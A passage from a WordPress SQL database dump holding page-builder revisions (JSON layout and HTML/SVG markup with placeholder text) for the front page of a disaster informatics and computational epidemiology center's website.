<!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',20,'https://gsudice.dataconn.net/?p=316',0,'revision','',0),(317,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',23,'https://gsudice.dataconn.net/?p=317',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (318,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path 